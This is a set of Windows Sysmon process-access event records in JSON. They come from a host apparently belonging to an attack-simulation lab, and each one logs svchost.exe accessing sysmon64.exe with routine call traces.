{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5985,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5986,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5987,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5988,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5989,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5990,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5991,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5992,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:44.019\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:44.019","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
